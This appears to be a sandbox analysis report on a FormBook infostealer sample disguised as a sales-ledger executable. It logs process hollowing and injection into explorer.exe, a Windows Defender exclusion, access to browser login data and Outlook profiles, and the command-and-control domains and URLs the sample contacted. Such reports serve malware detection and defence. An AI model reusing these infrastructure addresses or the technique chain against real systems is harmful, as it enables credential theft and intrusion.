Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread, 9_2_0040A272
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to steal Mail credentials (via file access)
Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Behavior Graph:

Behavior Graph ID: 385451  Sample: Require your Sales Ledger f...  Startdate: 12/04/2021  Architecture: WINDOWS  Score: 100

Sample-level DNS/IP: www.soretyje.com
Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures

Process tree (as drawn in the behavior graph):

  • Require your Sales Ledger from 01-April-2020.exe (started)
      Dropped: Require your Sales...m 01-April-2020.exe (PE32); Require your Sales...exe:Zone.Identifier (ASCII); Require your Sales...-April-2020.exe.log (ASCII); C:\Users\user\AppData\...\AdvancedRun.exe (PE32)
      Signature: Adds a directory exclusion to Windows Defender
      • Require your Sales Ledger from 01-April-2020.exe (started)
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
          • explorer.exe (injected)
              DNS/IP: www.seniorlivingcaelderly.com 185.53.179.90, ports 49737, 49738, 49739, TEAMINTERNET-ASDE, Germany
              Signature: System process connects to network (likely due to code injection or exploit)
              • cmmon32.exe (started)
                  Dropped: C:\Users\user\AppData\...\28Llogrv.ini (data); C:\Users\user\AppData\...\28Llogri.ini (data)
                  Signatures: Detected FormBook malware; Tries to steal Mail credentials (via file access); Tries to harvest and steal browser information (history, passwords, etc); 3 other signatures
                  • cmd.exe (started)
                      Dropped: C:\Users\user\AppData\Local\Temp\DB1 (SQLite)
                      Signature: Tries to harvest and steal browser information (history, passwords, etc)
      • AdvancedRun.exe (started)
          • AdvancedRun.exe (started)
          • conhost.exe (started)
      • powershell.exe (started)
          • conhost.exe (started)
      • AdvancedRun.exe (started)
          • AdvancedRun.exe (started)

Contacted Public IPs

IP            | Domain                        | Country | ASN   | ASN Name          | Malicious
185.53.179.90 | www.seniorlivingcaelderly.com | Germany | 61969 | TEAMINTERNET-ASDE | true

Contacted Domains

Name                          | IP            | Active
www.soretyje.com              | 81.17.18.194  | true
www.seniorlivingcaelderly.com | 185.53.179.90 | true

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.seniorlivingcaelderly.com/suod/ | true | Avira URL Cloud: safe | unknown
http://www.seniorlivingcaelderly.com/suod/?RL0=uVgD4bu0-2R4Or&Sxo=LsHPYRuctkoWulzKyGbvgGfg2m0Ehvoa2gaw5h/iu275rsWI7O6TvqToE0BPOi46d4K3 | true | Avira URL Cloud: safe | unknown
www.consultoramulticars.com/suod/ | true | Avira URL Cloud: safe | low